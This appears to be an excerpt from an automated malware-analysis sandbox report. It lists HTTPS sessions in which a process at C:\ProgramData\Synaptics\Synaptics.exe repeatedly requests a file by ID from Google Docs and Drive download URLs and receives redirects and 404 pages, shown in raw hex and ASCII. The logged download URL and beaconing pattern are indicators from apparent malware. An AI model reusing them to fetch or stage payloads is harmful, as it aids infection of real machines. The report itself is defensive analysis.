                                                                                                              2024-12-30 10:25:23 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 7a 73 6b 47 4c 78 30 70 69 72 54 37 34 30 62 48 65 78 6c 61 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tzskGLx0pirT740bHexlaA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                              2024-12-30 10:25:23 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.849719216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:23 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-4ZkOl0LQYY2uaFqPhKG1mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.849720216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:23 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-O1Sow3fopoYVtPuy3F_Fjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.849721172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:23 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-30 10:25:24 UTC1594INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC65RFh1stQNMiWIKh7_BpboglpkHG_1DoAe_alA7r-4gAEOC-RSWDLn-gSgoAvavu2l
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:23 GMT
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-jgpIe8FgLX5jhY9N1ESzww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Set-Cookie: NID=520=czYKQNpmbF8xhuE9ZZDngEfj9m1plovuJoyYjU4EiuE7tB9lL3Ilgxr-sn4Dib-PWEZ9YWy50kXcemjbyFsb5aD_4_PqJ_3F8VXnWk6W97rzmOV6c3a2MV332Ws7W0FyyqYnxD0COjJAzIn8kudCVQSzBa-LyX2gBLUCkSs92aCB3ytVv5R_nNg; expires=Tue, 01-Jul-2025 10:25:23 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:24 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 70 4c 36 34 6e 35 4e 5a 31 57 42 47 54 73 4c 52 4f 34 65 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ppL64n5NZ1WBGTsLRO4evA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                              2024-12-30 10:25:24 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.849723172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:23 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-30 10:25:24 UTC1602INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC67GMKUIhA5mINk54_qAF4PoixC-UDc-GV1Bz4vaUxSV2wpGu9Lix23_eJOt9xZWz9EZn_0Ewc
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:24 GMT
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-f4b_mMyWaIgXN3GzfDXqyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Set-Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP; expires=Tue, 01-Jul-2025 10:25:24 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:24 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 4f 6b 32 35 48 56 4a 44 77 37 6e 74 63 63 62 31 76 37 50 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1Ok25HVJDw7ntccb1v7PGQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                              2024-12-30 10:25:24 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.849726216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:24 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:24 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-lV1prnTf8wc49AxikkyCqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.849727216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:24 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:24 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-DLcceDpHEJJ8dRgvi3fIUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.849728172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:24 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:25 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7XiieQRc04AK74f-HHOxPyQ8uz2GNFoPLU-T-s-dj-Na3BKrn6y3r5DewtTX-bM7GWcaJXJzA
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:24 GMT
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-3aD9-CNYblhsc-4QNMOJew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:25 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:25:25 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 6a 46 49 4f 53 35 36 34 41 77 4b 79 6a 49 41 74 75 39 43 71 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="KjFIOS564AwKyjIAtu9CqA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:25:25 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.849730172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:24 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6CnMTE8cnbgu3l_dQOP5JeZjAiv-iKXOObpP1z3dvj1TFJIOQ5URm5aFFaAL2FBTQU
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:25 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Jg1xiFdq0G9mwlzg40wuPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
